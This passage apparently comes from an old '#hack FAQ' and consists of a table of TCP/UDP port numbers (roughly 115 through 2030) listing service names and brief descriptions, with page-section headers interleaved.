SFTP 115/UDP SIMPLE FILE TRANSFER PROTOCOL
|
|||
|
ANSANOTIFY 116/TCP ANSA REX NOTIFY
|
|||
|
ANSANOTIFY 116/UDP ANSA REX NOTIFY
|
|||
|
UUCP-PATH 117/TCP UUCP PATH SERVICE
|
|||
|
UUCP-PATH 117/UDP UUCP PATH SERVICE
|
|||
|
SQLSERV 118/TCP SQL SERVICES
|
|||
|
SQLSERV 118/UDP SQL SERVICES
|
|||
|
NNTP 119/TCP NETWORK NEWS TRANSFER PROTOCOL
|
|||
|
NNTP 119/UDP NETWORK NEWS TRANSFER PROTOCOL
|
|||
|
CFDPTKT 120/TCP CFDPTKT
|
|||
|
CFDPTKT 120/UDP CFDPTKT
|
|||
|
ERPC 121/TCP ENCORE EXPEDITED REMOTE PRO.CALL
|
|||
|
ERPC 121/UDP ENCORE EXPEDITED REMOTE PRO.CALL
|
|||
|
SMAKYNET 122/TCP SMAKYNET
|
|||
|
SMAKYNET 122/UDP SMAKYNET
|
|||
|
|
|||
|
#hack FAQ (70/1941)
|
|||
|
NTP 123/TCP NETWORK TIME PROTOCOL
|
|||
|
NTP 123/UDP NETWORK TIME PROTOCOL
|
|||
|
ANSATRADER 124/TCP ANSA REX TRADER
|
|||
|
ANSATRADER 124/UDP ANSA REX TRADER
|
|||
|
LOCUS-MAP 125/TCP LOCUS PC-INTERFACE NET MAP SER
|
|||
|
LOCUS-MAP 125/UDP LOCUS PC-INTERFACE NET MAP SER
|
|||
|
UNITARY 126/TCP UNISYS UNITARY LOGIN
|
|||
|
UNITARY 126/UDP UNISYS UNITARY LOGIN
|
|||
|
LOCUS-CON 127/TCP LOCUS PC-INTERFACE CONN SERVER
|
|||
|
LOCUS-CON 127/UDP LOCUS PC-INTERFACE CONN SERVER
|
|||
|
GSS-XLICEN 128/TCP GSS X LICENSE VERIFICATION
|
|||
|
GSS-XLICEN 128/UDP GSS X LICENSE VERIFICATION
|
|||
|
PWDGEN 129/TCP PASSWORD GENERATOR PROTOCOL
|
|||
|
PWDGEN 129/UDP PASSWORD GENERATOR PROTOCOL
|
|||
|
CISCO-FNA 130/TCP CISCO FNATIVE
|
|||
|
CISCO-FNA 130/UDP CISCO FNATIVE
|
|||
|
CISCO-TNA 131/TCP CISCO TNATIVE
|
|||
|
CISCO-TNA 131/UDP CISCO TNATIVE
|
|||
|
CISCO-SYS 132/TCP CISCO SYSMAINT
|
|||
|
CISCO-SYS 132/UDP CISCO SYSMAINT
|
|||
|
STATSRV 133/TCP STATISTICS SERVICE
|
|||
|
STATSRV 133/UDP STATISTICS SERVICE
|
|||
|
|
|||
|
#hack FAQ (70/1963)
|
|||
|
INGRES-NET 134/TCP INGRES-NET SERVICE
|
|||
|
INGRES-NET 134/UDP INGRES-NET SERVICE
|
|||
|
LOC-SRV 135/TCP LOCATION SERVICE
|
|||
|
LOC-SRV 135/UDP LOCATION SERVICE
|
|||
|
PROFILE 136/TCP PROFILE NAMING SYSTEM
|
|||
|
PROFILE 136/UDP PROFILE NAMING SYSTEM
|
|||
|
NETBIOS-NS 137/TCP NETBIOS NAME SERVICE
|
|||
|
NETBIOS-NS 137/UDP NETBIOS NAME SERVICE
|
|||
|
NETBIOS-DGM 138/TCP NETBIOS DATAGRAM SERVICE
|
|||
|
NETBIOS-DGM 138/UDP NETBIOS DATAGRAM SERVICE
|
|||
|
NETBIOS-SSN 139/TCP NETBIOS SESSION SERVICE
|
|||
|
NETBIOS-SSN 139/UDP NETBIOS SESSION SERVICE
|
|||
|
EMFIS-DATA 140/TCP EMFIS DATA SERVICE
|
|||
|
EMFIS-DATA 140/UDP EMFIS DATA SERVICE
|
|||
|
EMFIS-CNTL 141/TCP EMFIS CONTROL SERVICE
|
|||
|
EMFIS-CNTL 141/UDP EMFIS CONTROL SERVICE
|
|||
|
BL-IDM 142/TCP BRITTON-LEE IDM
|
|||
|
BL-IDM 142/UDP BRITTON-LEE IDM
|
|||
|
IMAP2 143/TCP INTERIM MAIL ACCESS PROTOCOL V2
|
|||
|
IMAP2 143/UDP INTERIM MAIL ACCESS PROTOCOL V2
|
|||
|
NEWS 144/TCP NEWS
|
|||
|
NEWS 144/UDP NEWS
|
|||
|
|
|||
|
#hack FAQ (70/1985)
|
|||
|
UAAC 145/TCP UAAC PROTOCOL
|
|||
|
UAAC 145/UDP UAAC PROTOCOL
|
|||
|
ISO-TP0 146/TCP ISO-IP0
|
|||
|
ISO-TP0 146/UDP ISO-IP0
|
|||
|
ISO-IP 147/TCP ISO-IP
|
|||
|
ISO-IP 147/UDP ISO-IP
|
|||
|
CRONUS 148/TCP CRONUS-SUPPORT
|
|||
|
CRONUS 148/UDP CRONUS-SUPPORT
|
|||
|
AED-512 149/TCP AED 512 EMULATION SERVICE
|
|||
|
AED-512 149/UDP AED 512 EMULATION SERVICE
|
|||
|
SQL-NET 150/TCP SQL-NET
|
|||
|
SQL-NET 150/UDP SQL-NET
|
|||
|
HEMS 151/TCP HEMS
|
|||
|
HEMS 151/UDP HEMS
|
|||
|
BFTP 152/TCP BACKGROUND FILE TRANSFER PROGRAM
|
|||
|
BFTP 152/UDP BACKGROUND FILE TRANSFER PROGRAM
|
|||
|
SGMP 153/TCP SGMP
|
|||
|
SGMP 153/UDP SGMP
|
|||
|
NETSC-PROD 154/TCP NETSC
|
|||
|
NETSC-PROD 154/UDP NETSC
|
|||
|
NETSC-DEV 155/TCP NETSC
|
|||
|
NETSC-DEV 155/UDP NETSC
|
|||
|
|
|||
|
#hack FAQ (70/2007)
|
|||
|
SQLSRV 156/TCP SQL SERVICE
|
|||
|
SQLSRV 156/UDP SQL SERVICE
|
|||
|
KNET-CMP 157/TCP KNET/VM COMMAND/MESSAGE PROTOCOL
|
|||
|
KNET-CMP 157/UDP KNET/VM COMMAND/MESSAGE PROTOCOL
|
|||
|
PCMAIL-SRV 158/TCP PCMAIL SERVER
|
|||
|
PCMAIL-SRV 158/UDP PCMAIL SERVER
|
|||
|
NSS-ROUTING 159/TCP NSS-ROUTING
|
|||
|
NSS-ROUTING 159/UDP NSS-ROUTING
|
|||
|
SGMP-TRAPS 160/TCP SGMP-TRAPS
|
|||
|
SGMP-TRAPS 160/UDP SGMP-TRAPS
|
|||
|
SNMP 161/TCP SNMP
|
|||
|
SNMP 161/UDP SNMP
|
|||
|
SNMPTRAP 162/TCP SNMPTRAP
|
|||
|
SNMPTRAP 162/UDP SNMPTRAP
|
|||
|
CMIP-MAN 163/TCP CMIP/TCP MANAGER
|
|||
|
CMIP-MAN 163/UDP CMIP/TCP MANAGER
|
|||
|
CMIP-AGENT 164/TCP CMIP/TCP AGENT
|
|||
|
SMIP-AGENT 164/UDP CMIP/TCP AGENT
|
|||
|
XNS-COURIER 165/TCP XEROX
|
|||
|
XNS-COURIER 165/UDP XEROX
|
|||
|
S-NET 166/TCP SIRIUS SYSTEMS
|
|||
|
S-NET 166/UDP SIRIUS SYSTEMS
|
|||
|
|
|||
|
#hack FAQ (70/2029)
|
|||
|
NAMP 167/TCP NAMP
|
|||
|
NAMP 167/UDP NAMP
|
|||
|
RSVD 168/TCP RSVD
|
|||
|
RSVD 168/UDP RSVD
|
|||
|
SEND 169/TCP SEND
|
|||
|
SEND 169/UDP SEND
|
|||
|
PRINT-SRV 170/TCP NETWORK POSTSCRIPT
|
|||
|
PRINT-SRV 170/UDP NETWORK POSTSCRIPT
|
|||
|
MULTIPLEX 171/TCP NETWORK INNOVATIONS MULTIPLEX
|
|||
|
MULTIPLEX 171/UDP NETWORK INNOVATIONS MULTIPLEX
|
|||
|
CL/1 172/TCP NETWORK INNOVATIONS CL/1
|
|||
|
CL/1 172/UDP NETWORK INNOVATIONS CL/1
|
|||
|
XYPLEX-MUX 173/TCP XYPLEX
|
|||
|
XYPLEX-MUX 173/UDP XYPLEX
|
|||
|
MAILQ 174/TCP MAILQ
|
|||
|
MAILQ 174/UDP MAILQ
|
|||
|
VMNET 175/TCP VMNET
|
|||
|
VMNET 175/UDP VMNET
|
|||
|
GENRAD-MUX 176/TCP GENRAD-MUX
|
|||
|
GENRAD-MUX 176/UDP GENRAD-MUX
|
|||
|
XDMCP 177/TCP X DISPLAY MANAGER CONTROL PROTOCOL
|
|||
|
XDMCP 177/UDP X DISPLAY MANAGER CONTROL PROTOCOL
|
|||
|
|
|||
|
#hack FAQ (70/2051)
|
|||
|
NEXTSTEP 178/TCP NEXTSTEP WINDOW SERVER
|
|||
|
NEXTSTEP 178/UDP NEXTSTEP WINDOW SERVER
|
|||
|
BGP 179/TCP BORDER GATEWAY PROTOCOL
|
|||
|
BGP 179/UDP BORDER GATEWAY PROTOCOL
|
|||
|
RIS 180/TCP INTERGRAPH
|
|||
|
RIS 180/UDP INTERGRAPH
|
|||
|
UNIFY 181/TCP UNIFY
|
|||
|
UNIFY 181/UDP UNIFY
|
|||
|
AUDIT 182/TCP UNISYS AUDIT SITP
|
|||
|
AUDIT 182/UDP UNISYS AUDIT SITP
|
|||
|
OCBINDER 183/TCP OCBINDER
|
|||
|
OCBINDER 183/UDP OCBINDER
|
|||
|
OCSERVER 184/TCP OCSERVER
|
|||
|
OCSERVER 184/UDP OCSERVER
|
|||
|
REMOTE-KIS 185/TCP REMOTE-KIS
|
|||
|
REMOTE-KIS 185/UDP REMOTE-KIS
|
|||
|
KIS 186/TCP KIS PROTOCOL
|
|||
|
KIS 186/UDP KIS PROTOCOL
|
|||
|
ACI 187/TCP APPLICATION COMMUNICATION INTERFACE
|
|||
|
ACI 187/UDP APPLICATION COMMUNICATION INTERFACE
|
|||
|
MUMPS 188/TCP PLUS FIVE'S MUMPS
|
|||
|
MUMPS 188/UDP PLUS FIVE'S MUMPS
|
|||
|
|
|||
|
#hack FAQ (70/2073)
|
|||
|
QFT 189/TCP QUEUED FILE TRANSPORT
|
|||
|
QFT 189/UDP QUEUED FILE TRANSPORT
|
|||
|
GACP 190/TCP GATEWAY ACCESS CONTROL PROTOCOL
|
|||
|
CACP 190/UDP GATEWAY ACCESS CONTROL PROTOCOL
|
|||
|
PROSPERO 191/TCP PROSPERO
|
|||
|
PROSPERO 191/UDP PROSPERO
|
|||
|
OSU-NMS 192/TCP OSU NETWORK MONITORING SYSTEM
|
|||
|
OSU-NMS 192/UDP OSU NETWORK MONITORING SYSTEM
|
|||
|
SRMP 193/TCP SPIDER REMOTE MONITORING PROTOCOL
|
|||
|
SRMP 193/UDP SPIDER REMOTE MONITORING PROTOCOL
|
|||
|
IRC 194/TCP INTERNET RELAY CHAT PROTOCOL
|
|||
|
IRC 194/UDP INTERNET RELAY CHAT PROTOCOL
|
|||
|
DN6-NLM-AUD 195/TCP DNSIX NETWORK LEVEL MODULE AUDIT
|
|||
|
DN6-NLM-AUD 195/UDP DNSIX NETWORK LEVEL MODULE AUDIT
|
|||
|
DN6-SMM-RED 196/TCP DNSIX SESSION MGT MODULE AUDIT REDIR
|
|||
|
DN6-SMM-RED 196/UDP DNSIX SESSION MGT MODULE AUDIT REDIR
|
|||
|
DLS 197/TCP DIRECTORY LOCATION SERVICE
|
|||
|
DLS 197/UDP DIRECTORY LOCATION SERVICE
|
|||
|
DLS-MON 198/TCP DIRECTORY LOCATION SERVICE MONITOR
|
|||
|
DLS-MON 198/UDP DIRECTORY LOCATION SERVICE MONITOR
|
|||
|
SMUX 199/TCP SMUX
|
|||
|
SMUX 199/UDP SMUX
|
|||
|
|
|||
|
#hack FAQ (70/2095)
|
|||
|
SRC 200/TCP IBM SYSTEM RESOURCE CONTROLLER
|
|||
|
SRC 200/UDP IBM SYSTEM RESOURCE CONTROLLER
|
|||
|
AT-RTMP 201/TCP APPLETALK ROUTING MAINTENANCE
|
|||
|
AT-RTMP 201/UDP APPLETALK ROUTING MAINTENANCE
|
|||
|
AT-NBP 202/TCP APPLETALK NAME BINDING
|
|||
|
AT-NBP 202/UDP APPLETALK NAME BINDING
|
|||
|
AT-3 203/TCP APPLETALK UNUSED
|
|||
|
AT-3 203/UDP APPLETALK UNUSED
|
|||
|
AT-ECHO 204/TCP APPLETALK ECHO
|
|||
|
AT-ECHO 204/UDP APPLETALK ECHO
|
|||
|
AT-5 205/TCP APPLETALK UNUSED
|
|||
|
AT-5 205/UDP APPLETALK UNUSED
|
|||
|
AT-ZIS 206/TCP APPLETALK ZONE INFORMATION
|
|||
|
AT-ZIS 206/UDP APPLETALK ZONE INFORMATION
|
|||
|
AT-7 207/TCP APPLETALK UNUSED
|
|||
|
AT-7 207/UDP APPLETALK UNUSED
|
|||
|
AT-8 208/TCP APPLETALK UNUSED
|
|||
|
AT-8 208/UDP APPLETALK UNUSED
|
|||
|
TAM 209/TCP TRIVIAL AUTHENTICATED MAIL PROTOCOL
|
|||
|
TAM 209/UDP TRIVIAL AUTHENTICATED MAIL PROTOCOL
|
|||
|
Z39.50 210/TCP ANSI Z39.50
|
|||
|
Z39.50 210/UDP ANSI Z39.50
|
|||
|
|
|||
|
#hack FAQ (70/2117)
|
|||
|
914C/G 211/TCP TEXAS INSTRUMENTS 914C/G TERMINAL
|
|||
|
914C/G 211/UDP TEXAS INSTRUMENTS 914C/G TERMINAL
|
|||
|
ANET 212/TCP ATEXSSTR
|
|||
|
ANET 212/UDP ATEXSSTR
|
|||
|
IPX 213/TCP IPX
|
|||
|
IPX 213/UDP IPX
|
|||
|
VMPWSCS 214/TCP VM PWSCS
|
|||
|
VMPWSCS 214/UDP VM PWSCS
|
|||
|
SOFTPC 215/TCP INSIGNIA SOLUTIONS
|
|||
|
SOFTPC 215/UDP INSIGNIA SOLUTIONS
|
|||
|
ATLS 216/TCP ACCESS TECHNOLOGY LICENSE SERVER
|
|||
|
ATLS 216/UDP ACCESS TECHNOLOGY LICENSE SERVER
|
|||
|
DBASE 217/TCP DBASE UNIX
|
|||
|
DBASE 217/UDP DBASE UNIX
|
|||
|
MPP 218/TCP NETIX MESSAGE POSTING PROTOCOL
|
|||
|
MPP 218/UDP NETIX MESSAGE POSTING PROTOCOL
|
|||
|
UARPS 219/TCP UNISYS ARPS
|
|||
|
UARPS 219/UDP UNISYS ARPS
|
|||
|
IMAP3 220/TCP INTERACTIVE MAIL ACCESS PROTOCOL V3
|
|||
|
IMAP3 220/UDP INTERACTIVE MAIL ACCESS PROTOCOL V3
|
|||
|
FLN-SPX 221/TCP BERKELEY RLOGIND WITH SPX AUTH
|
|||
|
FLN-SPX 221/UDP BERKELEY RLOGIND WITH SPX AUTH
|
|||
|
|
|||
|
#hack FAQ (70/2139)
|
|||
|
FSH-SPX 222/TCP BERKELEY RSHD WITH SPX AUTH
|
|||
|
FSH-SPX 222/UDP BERKELEY RSHD WITH SPX AUTH
|
|||
|
CDC 223/TCP CERTIFICATE DISTRIBUTION CENTER
|
|||
|
CDC 223/UDP CERTIFICATE DISTRIBUTION CENTER
|
|||
|
224-241 RESERVED
|
|||
|
SUR-MEAS 243/TCP SURVEY MEASUREMENT
|
|||
|
SUR-MEAS 243/UDP SURVEY MEASUREMENT
|
|||
|
LINK 245/TCP LINK
|
|||
|
LINK 245/UDP LINK
|
|||
|
DSP3270 246/TCP DISPLAY SYSTEMS PROTOCOL
|
|||
|
DSP3270 246/UDP DISPLAY SYSTEMS PROTOCOL
|
|||
|
247-255 RESERVED
|
|||
|
PAWSERV 345/TCP PERF ANALYSIS WORKBENCH
|
|||
|
PAWSERV 345/UDP PERF ANALYSIS WORKBENCH
|
|||
|
ZSERV 346/TCP ZEBRA SERVER
|
|||
|
ZSERV 346/UDP ZEBRA SERVER
|
|||
|
FATSERV 347/TCP FATMEN SERVER
|
|||
|
FATSERV 347/UDP FATMEN SERVER
|
|||
|
CLEARCASE 371/TCP CLEARCASE
|
|||
|
CLEARCASE 371/UDP CLEARCASE
|
|||
|
ULISTSERV 372/TCP UNIX LISTSERV
|
|||
|
ULISTSERV 372/UDP UNIX LISTSERV
|
|||
|
|
|||
|
#hack FAQ (70/2161)
|
|||
|
LEGENT-1 373/TCP LEGENT CORPORATION
|
|||
|
LEGENT-1 373/UDP LEGENT CORPORATION
|
|||
|
LEGENT-2 374/TCP LEGENT CORPORATION
|
|||
|
LEGENT-2 374/UDP LEGENT CORPORATION
|
|||
|
EXEC 512/TCP REMOTE PROCESS EXECUTION;
|
|||
|
AUTHENTICATION PERFORMED USING
|
|||
|
PASSWORDS AND UNIX LOGIN NAMES
|
|||
|
BIFF 512/UDP USED BY MAIL SYSTEM TO NOTIFY USERS
|
|||
|
OF NEW MAIL RECEIVED; CURRENTLY
|
|||
|
RECEIVES MESSAGES ONLY FROM
|
|||
|
PROCESSES ON THE SAME MACHINE
|
|||
|
LOGIN 513/TCP REMOTE LOGIN A LA TELNET;
|
|||
|
AUTOMATIC AUTHENTICATION PERFORMED
|
|||
|
BASED ON PRIVILEDGED PORT NUMBERS
|
|||
|
AND DISTRIBUTED DATA BASES WHICH
|
|||
|
IDENTIFY "AUTHENTICATION DOMAINS"
|
|||
|
WHO 513/UDP MAINTAINS DATA BASES SHOWING WHO'S
|
|||
|
LOGGED IN TO MACHINES ON A LOCAL
|
|||
|
NET AND THE LOAD AVERAGE OF THE
|
|||
|
MACHINE
|
|||
|
CMD 514/TCP LIKE EXEC, BUT AUTOMATIC
|
|||
|
AUTHENTICATION IS PERFORMED AS FOR
|
|||
|
|
|||
|
#hack FAQ (70/2183)
|
|||
|
LOGIN SERVER
|
|||
|
SYSLOG 514/UDP
|
|||
|
PRINTER 515/TCP SPOOLER
|
|||
|
PRINTER 515/UDP SPOOLER
|
|||
|
TALK 517/TCP LIKE TENEX LINK, BUT ACROSS
|
|||
|
MACHINE - UNFORTUNATELY, DOESN'T
|
|||
|
USE LINK PROTOCOL (THIS IS ACTUALLY
|
|||
|
JUST A RENDEZVOUS PORT FROM WHICH A
|
|||
|
TCP CONNECTION IS ESTABLISHED)
|
|||
|
TALK 517/UDP LIKE TENEX LINK, BUT ACROSS
|
|||
|
MACHINE - UNFORTUNATELY, DOESN'T
|
|||
|
USE LINK PROTOCOL (THIS IS ACTUALLY
|
|||
|
JUST A RENDEZVOUS PORT FROM WHICH A
|
|||
|
TCP CONNECTION IS ESTABLISHED)
|
|||
|
NTALK 518/TCP
|
|||
|
NTALK 518/UDP
|
|||
|
UTIME 519/TCP UNIXTIME
|
|||
|
UTIME 519/UDP UNIXTIME
|
|||
|
EFS 520/TCP EXTENDED FILE NAME SERVER
|
|||
|
ROUTER 520/UDP LOCAL ROUTING PROCESS (ON SITE);
|
|||
|
USES VARIANT OF XEROX NS ROUTING
|
|||
|
INFORMATION PROTOCOL
|
|||
|
|
|||
|
#hack FAQ (70/2205)
|
|||
|
TIMED 525/TCP TIMESERVER
|
|||
|
TIMED 525/UDP TIMESERVER
|
|||
|
TEMPO 526/TCP NEWDATE
|
|||
|
TEMPO 526/UDP NEWDATE
|
|||
|
COURIER 530/TCP RPC
|
|||
|
COURIER 530/UDP RPC
|
|||
|
CONFERENCE 531/TCP CHAT
|
|||
|
CONFERENCE 531/UDP CHAT
|
|||
|
NETNEWS 532/TCP READNEWS
|
|||
|
NETNEWS 532/UDP READNEWS
|
|||
|
NETWALL 533/TCP FOR EMERGENCY BROADCASTS
|
|||
|
NETWALL 533/UDP FOR EMERGENCY BROADCASTS
|
|||
|
UUCP 540/TCP UUCPD
|
|||
|
UUCP 540/UDP UUCPD
|
|||
|
KLOGIN 543/TCP
|
|||
|
KLOGIN 543/UDP
|
|||
|
KSHELL 544/TCP KRCMD
|
|||
|
KSHELL 544/UDP KRCMD
|
|||
|
NEW-RWHO 550/TCP NEW-WHO
|
|||
|
NEW-RWHO 550/UDP NEW-WHO
|
|||
|
DSF 555/TCP
|
|||
|
DSF 555/UDP
|
|||
|
|
|||
|
#hack FAQ (70/2227)
|
|||
|
REMOTEFS 556/TCP RFS SERVER
|
|||
|
REMOTEFS 556/UDP RFS SERVER
|
|||
|
RMONITOR 560/TCP RMONITORD
|
|||
|
RMONITOR 560/UDP RMONITORD
|
|||
|
MONITOR 561/TCP
|
|||
|
MONITOR 561/UDP
|
|||
|
CHSHELL 562/TCP CHCMD
|
|||
|
CHSHELL 562/UDP CHCMD
|
|||
|
9PFS 564/TCP PLAN 9 FILE SERVICE
|
|||
|
9PFS 564/UDP PLAN 9 FILE SERVICE
|
|||
|
WHOAMI 565/TCP WHOAMI
|
|||
|
WHOAMI 565/UDP WHOAMI
|
|||
|
METER 570/TCP DEMON
|
|||
|
METER 570/UDP DEMON
|
|||
|
METER 571/TCP UDEMON
|
|||
|
METER 571/UDP UDEMON
|
|||
|
IPCSERVER 600/TCP SUN IPC SERVER
|
|||
|
IPCSERVER 600/UDP SUN IPC SERVER
|
|||
|
NQS 607/TCP NQS
|
|||
|
NQS 607/UDP NQS
|
|||
|
MDQS 666/TCP
|
|||
|
MDQS 666/UDP
|
|||
|
|
|||
|
#hack FAQ (70/2249)
|
|||
|
ELCSD 704/TCP ERRLOG COPY/SERVER DAEMON
|
|||
|
ELCSD 704/UDP ERRLOG COPY/SERVER DAEMON
|
|||
|
NETCP 740/TCP NETSCOUT CONTROL PROTOCOL
|
|||
|
NETCP 740/UDP NETSCOUT CONTROL PROTOCOL
|
|||
|
NETGW 741/TCP NETGW
|
|||
|
NETGW 741/UDP NETGW
|
|||
|
NETRCS 742/TCP NETWORK BASED REV. CONT. SYS.
|
|||
|
NETRCS 742/UDP NETWORK BASED REV. CONT. SYS.
|
|||
|
FLEXLM 744/TCP FLEXIBLE LICENSE MANAGER
|
|||
|
FLEXLM 744/UDP FLEXIBLE LICENSE MANAGER
|
|||
|
FUJITSU-DEV 747/TCP FUJITSU DEVICE CONTROL
|
|||
|
FUJITSU-DEV 747/UDP FUJITSU DEVICE CONTROL
|
|||
|
RIS-CM 748/TCP RUSSELL INFO SCI CALENDAR MANAGER
|
|||
|
RIS-CM 748/UDP RUSSELL INFO SCI CALENDAR MANAGER
|
|||
|
KERBEROS-ADM 749/TCP KERBEROS ADMINISTRATION
|
|||
|
KERBEROS-ADM 749/UDP KERBEROS ADMINISTRATION
|
|||
|
RFILE 750/TCP
|
|||
|
LOADAV 750/UDP
|
|||
|
PUMP 751/TCP
|
|||
|
PUMP 751/UDP
|
|||
|
QRH 752/TCP
|
|||
|
QRH 752/UDP
|
|||
|
|
|||
|
#hack FAQ (70/2271)
|
|||
|
RRH 753/TCP
|
|||
|
RRH 753/UDP
|
|||
|
TELL 754/TCP SEND
|
|||
|
TELL 754/UDP SEND
|
|||
|
NLOGIN 758/TCP
|
|||
|
NLOGIN 758/UDP
|
|||
|
CON 759/TCP
|
|||
|
CON 759/UDP
|
|||
|
NS 760/TCP
|
|||
|
NS 760/UDP
|
|||
|
RXE 761/TCP
|
|||
|
RXE 761/UDP
|
|||
|
QUOTAD 762/TCP
|
|||
|
QUOTAD 762/UDP
|
|||
|
CYCLESERV 763/TCP
|
|||
|
CYCLESERV 763/UDP
|
|||
|
OMSERV 764/TCP
|
|||
|
OMSERV 764/UDP
|
|||
|
WEBSTER 765/TCP
|
|||
|
WEBSTER 765/UDP
|
|||
|
PHONEBOOK 767/TCP PHONE
|
|||
|
PHONEBOOK 767/UDP PHONE
|
|||
|
|
|||
|
#hack FAQ (70/2293)
|
|||
|
VID 769/TCP
|
|||
|
VID 769/UDP
|
|||
|
CADLOCK 770/TCP
|
|||
|
CADLOCK 770/UDP
|
|||
|
RTIP 771/TCP
|
|||
|
RTIP 771/UDP
|
|||
|
CYCLESERV2 772/TCP
|
|||
|
CYCLESERV2 772/UDP
|
|||
|
SUBMIT 773/TCP
|
|||
|
NOTIFY 773/UDP
|
|||
|
RPASSWD 774/TCP
|
|||
|
ACMAINT_DBD 774/UDP
|
|||
|
ENTOMB 775/TCP
|
|||
|
ACMAINT_TRANSD 775/UDP
|
|||
|
WPAGES 776/TCP
|
|||
|
WPAGES 776/UDP
|
|||
|
WPGS 780/TCP
|
|||
|
WPGS 780/UDP
|
|||
|
HP-COLLECTOR 781/TCP HP PERFORMANCE DATA COLLECTOR
|
|||
|
HP-COLLECTOR 781/UDP HP PERFORMANCE DATA COLLECTOR
|
|||
|
HP-MANAGED-NODE 782/TCP HP PERFORMANCE DATA MANAGED NODE
|
|||
|
HP-MANAGED-NODE 782/UDP HP PERFORMANCE DATA MANAGED NODE
|
|||
|
|
|||
|
#hack FAQ (70/2315)
|
|||
|
HP-ALARM-MGR 783/TCP HP PERFORMANCE DATA ALARM MANAGER
|
|||
|
HP-ALARM-MGR 783/UDP HP PERFORMANCE DATA ALARM MANAGER
|
|||
|
MDBS_DAEMON 800/TCP
|
|||
|
MDBS_DAEMON 800/UDP
|
|||
|
DEVICE 801/TCP
|
|||
|
DEVICE 801/UDP
|
|||
|
XTREELIC 996/TCP XTREE LICENSE SERVER
|
|||
|
XTREELIC 996/UDP XTREE LICENSE SERVER
|
|||
|
MAITRD 997/TCP
|
|||
|
MAITRD 997/UDP
|
|||
|
BUSBOY 998/TCP
|
|||
|
PUPARP 998/UDP
|
|||
|
GARCON 999/TCP
|
|||
|
APPLIX 999/UDP APPLIX AC
|
|||
|
PUPROUTER 999/TCP
|
|||
|
PUPROUTER 999/UDP
|
|||
|
CADLOCK 1000/TCP
|
|||
|
OCK 1000/UDP
|
|||
|
BLACKJACK 1025/TCP NETWORK BLACKJACK
|
|||
|
BLACKJACK 1025/UDP NETWORK BLACKJACK
|
|||
|
HERMES 1248/TCP
|
|||
|
HERMES 1248/UDP
|
|||
|
|
|||
|
#hack FAQ (70/2337)
|
|||
|
BBN-MMC 1347/TCP MULTI MEDIA CONFERENCING
|
|||
|
BBN-MMC 1347/UDP MULTI MEDIA CONFERENCING
|
|||
|
BBN-MMX 1348/TCP MULTI MEDIA CONFERENCING
|
|||
|
BBN-MMX 1348/UDP MULTI MEDIA CONFERENCING
|
|||
|
SBOOK 1349/TCP REGISTRATION NETWORK PROTOCOL
|
|||
|
SBOOK 1349/UDP REGISTRATION NETWORK PROTOCOL
|
|||
|
EDITBENCH 1350/TCP REGISTRATION NETWORK PROTOCOL
|
|||
|
EDITBENCH 1350/UDP REGISTRATION NETWORK PROTOCOL
|
|||
|
EQUATIONBUILDER 1351/TCP DIGITAL TOOL WORKS (MIT)
|
|||
|
EQUATIONBUILDER 1351/UDP DIGITAL TOOL WORKS (MIT)
|
|||
|
LOTUSNOTE 1352/TCP LOTUS NOTE
|
|||
|
LOTUSNOTE 1352/UDP LOTUS NOTE
|
|||
|
INGRESLOCK 1524/TCP INGRES
|
|||
|
INGRESLOCK 1524/UDP INGRES
|
|||
|
ORASRV 1525/TCP ORACLE
|
|||
|
ORASRV 1525/UDP ORACLE
|
|||
|
PROSPERO-NP 1525/TCP PROSPERO NON-PRIVILEGED
|
|||
|
PROSPERO-NP 1525/UDP PROSPERO NON-PRIVILEGED
|
|||
|
TLISRV 1527/TCP ORACLE
|
|||
|
TLISRV 1527/UDP ORACLE
|
|||
|
COAUTHOR 1529/TCP ORACLE
|
|||
|
COAUTHOR 1529/UDP ORACLE
|
|||
|
|
|||
|
#hack FAQ (70/2359)
|
|||
|
ISSD 1600/TCP
|
|||
|
ISSD 1600/UDP
|
|||
|
NKD 1650/TCP
|
|||
|
NKD 1650/UDP
|
|||
|
CALLBOOK 2000/TCP
|
|||
|
CALLBOOK 2000/UDP
|
|||
|
DC 2001/TCP
|
|||
|
WIZARD 2001/UDP CURRY
|
|||
|
GLOBE 2002/TCP
|
|||
|
GLOBE 2002/UDP
|
|||
|
MAILBOX 2004/TCP
|
|||
|
EMCE 2004/UDP CCWS MM CONF
|
|||
|
BERKNET 2005/TCP
|
|||
|
ORACLE 2005/UDP
|
|||
|
INVOKATOR 2006/TCP
|
|||
|
RAID-CC 2006/UDP RAID
|
|||
|
DECTALK 2007/TCP
|
|||
|
RAID-AM 2007/UDP
|
|||
|
CONF 2008/TCP
|
|||
|
TERMINALDB 2008/UDP
|
|||
|
NEWS 2009/TCP
|
|||
|
WHOSOCKAMI 2009/UDP
|
|||
|
|
|||
|
#hack FAQ (70/2381)
|
|||
|
SEARCH 2010/TCP
|
|||
|
PIPE_SERVER 2010/UDP
|
|||
|
RAID-CC 2011/TCP RAID
|
|||
|
SERVSERV 2011/UDP
|
|||
|
TTYINFO 2012/TCP
|
|||
|
RAID-AC 2012/UDP
|
|||
|
RAID-AM 2013/TCP
|
|||
|
RAID-CD 2013/UDP
|
|||
|
TROFF 2014/TCP
|
|||
|
RAID-SF 2014/UDP
|
|||
|
CYPRESS 2015/TCP
|
|||
|
RAID-CS 2015/UDP
|
|||
|
BOOTSERVER 2016/TCP
|
|||
|
BOOTSERVER 2016/UDP
|
|||
|
CYPRESS-STAT 2017/TCP
|
|||
|
BOOTCLIENT 2017/UDP
|
|||
|
TERMINALDB 2018/TCP
|
|||
|
RELLPACK 2018/UDP
|
|||
|
WHOSOCKAMI 2019/TCP
|
|||
|
ABOUT 2019/UDP
|
|||
|
XINUPAGESERVER 2020/TCP
|
|||
|
XINUPAGESERVER 2020/UDP
|
|||
|
|
|||
|
#hack FAQ (70/2403)
|
|||
|
SERVEXEC 2021/TCP
|
|||
|
XINUEXPANSION1 2021/UDP
|
|||
|
DOWN 2022/TCP
|
|||
|
XINUEXPANSION2 2022/UDP
|
|||
|
XINUEXPANSION3 2023/TCP
|
|||
|
XINUEXPANSION3 2023/UDP
|
|||
|
XINUEXPANSION4 2024/TCP
|
|||
|
XINUEXPANSION4 2024/UDP
|
|||
|
ELLPACK 2025/TCP
|
|||
|
XRIBS 2025/UDP
|
|||
|
SCRABBLE 2026/TCP
|
|||
|
SCRABBLE 2026/UDP
|
|||
|
SHADOWSERVER 2027/TCP
|
|||
|
SHADOWSERVER 2027/UDP
|
|||
|
SUBMITSERVER 2028/TCP
|
|||
|
SUBMITSERVER 2028/UDP
|
|||
|
DEVICE2 2030/TCP
|
